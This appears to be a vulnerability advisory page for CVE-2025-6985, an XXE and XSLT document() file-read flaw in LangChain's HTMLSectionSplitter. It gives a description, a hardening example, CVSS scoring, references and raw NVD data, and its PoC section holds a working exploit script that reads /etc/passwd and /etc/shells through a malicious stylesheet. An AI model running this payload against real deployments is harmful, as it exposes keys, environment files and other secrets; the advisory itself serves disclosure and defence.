CVE-2025-6985

Description

The HTMLSectionSplitter class in langchain-text-splitters version 0.3.8 is vulnerable to XML External Entity (XXE) attacks due to unsafe XSLT parsing. This vulnerability arises because the class allows the use of arbitrary XSLT stylesheets, which are parsed using lxml.etree.parse() and lxml.etree.XSLT() without any hardening measures. In lxml versions up to 4.9.x, external entities are resolved by default, allowing attackers to read arbitrary local files or perform outbound HTTP(S) fetches. In lxml versions 5.0 and above, while entity expansion is disabled, the XSLT document() function can still read any URI unless XSLTAccessControl is applied. This vulnerability allows remote attackers to gain read-only access to any file the LangChain process can reach, including sensitive files such as SSH keys, environment files, source code, or cloud metadata. No authentication, special privileges, or user interaction are required, and the issue is exploitable in default deployments that enable custom XSLT.
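
The hardening that the description says is missing can be sketched as follows. This is a minimal illustration, not the upstream fix: the helper name hardened_transform is hypothetical, and it assumes lxml is installed. It combines a parser that does not expand entities with XSLTAccessControl.DENY_ALL, so document() cannot read files or network resources.

```python
from lxml import etree


def hardened_transform(xslt_text, xml_text):
    """Apply a stylesheet with entity expansion and XSLT I/O disabled.

    Hypothetical helper for illustration. Returns the serialized result,
    or None if libxslt aborts the transform (for example on a denied read).
    """
    # Parser that neither expands entities nor loads DTDs or network resources.
    parser = etree.XMLParser(resolve_entities=False, no_network=True, load_dtd=False)
    xslt_root = etree.fromstring(xslt_text.encode("utf-8"), parser)
    source_root = etree.fromstring(xml_text.encode("utf-8"), parser)

    # DENY_ALL blocks file and network access from inside the transform,
    # which covers the document() function.
    transform = etree.XSLT(xslt_root, access_control=etree.XSLTAccessControl.DENY_ALL)
    try:
        return str(transform(source_root))
    except etree.XSLTError:
        return None
```

A benign stylesheet still transforms normally under these settings. One that calls document() on a local file should either fail or produce output without the file's contents.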

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
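
As a cross-check, the 7.5 score can be recomputed from the vector string. The sketch below follows the published CVSS v3.0 base-score equations and metric weights. The function name cvss3_base_score is an illustrative choice, and the parser assumes a well-formed base vector with no temporal or environmental metrics.

```python
import math

# Metric weights from the CVSS v3.0 specification.
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}


def roundup(value):
    """Round up to one decimal place, as the specification requires."""
    return math.ceil(value * 10) / 10


def cvss3_base_score(vector):
    """Compute the base score for a CVSS:3.x base vector string."""
    # Skip the "CVSS:3.0" prefix and map each metric to its value.
    metrics = dict(item.split(":") for item in vector.split("/")[1:])
    changed = metrics["S"] == "C"
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[metrics["PR"]]

    exploitability = 8.22 * AV[metrics["AV"]] * AC[metrics["AC"]] * pr * UI[metrics["UI"]]
    iss = 1 - (1 - CIA[metrics["C"]]) * (1 - CIA[metrics["I"]]) * (1 - CIA[metrics["A"]])
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss

    if impact <= 0:
        return 0.0
    total = impact + exploitability
    if changed:
        total *= 1.08
    return roundup(min(total, 10))


print(cvss3_base_score("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"))  # 7.5
```

For this vector the exploitability sub-score is about 3.89 and the impact sub-score about 3.60, which matches the 3.9 and 3.6 reported in the raw record after rounding.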

Configurations (Affected Products)

No CPE configuration data available. The affected combinations below are taken from the description.

langchain-text-splitters == 0.3.8

lxml <= 4.9.x (entities resolved by default)

lxml >= 5.0.0 (XSLTAccessControl not configured)
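
The version split above can be expressed as a small triage helper. This is a sketch only: the function name exposed_vectors and the returned labels are hypothetical. It also assumes, beyond what the description states outright, that document() reads are possible on lxml 4.x as well whenever no XSLTAccessControl is applied.

```python
def exposed_vectors(lxml_version, access_control_applied=False):
    """List the read vectors the description attributes to an lxml setup.

    lxml_version is a dotted version string such as "4.9.3".
    access_control_applied says whether the caller passes a restrictive
    XSLTAccessControl to lxml.etree.XSLT().
    """
    major = int(lxml_version.split(".")[0])
    vectors = []
    if major < 5:
        # Up to 4.9.x, external entities are resolved by default.
        vectors.append("external entity resolution")
    if not access_control_applied:
        # Without access control, document() can load arbitrary URIs.
        vectors.append("XSLT document() reads")
    return vectors


print(exposed_vectors("4.9.3"))        # both vectors
print(exposed_vectors("5.2.1"))        # document() only
print(exposed_vectors("5.2.1", True))  # empty list
```

XSLTAccessControl only restricts the transform step. On lxml 4.x, entity resolution happens in the parser and has to be disabled separately.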

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-6985 PoC - XXE via XSLT in langchain-text-splitters
# Vulnerability: HTMLSectionSplitter parses a caller-supplied XSLT file without hardening

import tempfile

from langchain_text_splitters import HTMLSectionSplitter

# Malicious XSLT stylesheet combining the two vectors from the description:
#   1. an external entity (resolved by default in lxml <= 4.9.x)
#   2. the XSLT document() function (not blocked in lxml >= 5.0 unless
#      XSLTAccessControl is applied); document() parses its target as XML
malicious_xslt = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xsl:stylesheet [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <output>
      <file_content>&xxe;</file_content>
      <!-- Alternative: use document() to read arbitrary files -->
      <secret_content>
        <xsl:copy-of select="document('file:///etc/shells')"/>
      </secret_content>
    </output>
  </xsl:template>
</xsl:stylesheet>"""

# HTML content to be processed
html_content = """
<html>
<head><title>Test</title></head>
<body>
<h1>Section Header</h1>
<p>This is test content for the splitter.</p>
</body>
</html>
"""

# HTMLSectionSplitter 0.3.8 takes the stylesheet as a file path (xslt_path),
# so write the payload to a temporary file first
with tempfile.NamedTemporaryFile("w", suffix=".xslt", encoding="utf-8", delete=False) as fh:
    fh.write(malicious_xslt)
    xslt_path = fh.name

# Trigger the vulnerability by pointing the splitter at the malicious XSLT
splitter = HTMLSectionSplitter(
    headers_to_split_on=[("h1", "Header 1")],
    xslt_path=xslt_path  # Vulnerable: parsed and applied without hardening
)

# Process HTML - on a vulnerable lxml configuration, the entity and/or the
# document() call is resolved while the stylesheet is parsed and applied
chunks = splitter.split_text(html_content)
for chunk in chunks:
    # Depending on the lxml version, the output may contain the file contents
    print(chunk.page_content)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-6985
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-6985
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-6985/
[4] VulDB https://vuldb.com/cve/CVE-2025-6985
[5] Huntr https://huntr.com/bounties/cf78abbb-df3b-43de-b6ee-132b73ff8331

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-6985", "sourceIdentifier": "[email protected]", "published": "2025-10-06T18:15:52.857", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The HTMLSectionSplitter class in langchain-text-splitters version 0.3.8 is vulnerable to XML External Entity (XXE) attacks due to unsafe XSLT parsing. This vulnerability arises because the class allows the use of arbitrary XSLT stylesheets, which are parsed using lxml.etree.parse() and lxml.etree.XSLT() without any hardening measures. In lxml versions up to 4.9.x, external entities are resolved by default, allowing attackers to read arbitrary local files or perform outbound HTTP(S) fetches. In lxml versions 5.0 and above, while entity expansion is disabled, the XSLT document() function can still read any URI unless XSLTAccessControl is applied. This vulnerability allows remote attackers to gain read-only access to any file the LangChain process can reach, including sensitive files such as SSH keys, environment files, source code, or cloud metadata. No authentication, special privileges, or user interaction are required, and the issue is exploitable in default deployments that enable custom XSLT."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-611"}]}], "references": [{"url": "https://huntr.com/bounties/cf78abbb-df3b-43de-b6ee-132b73ff8331", "source": "[email protected]"}]}}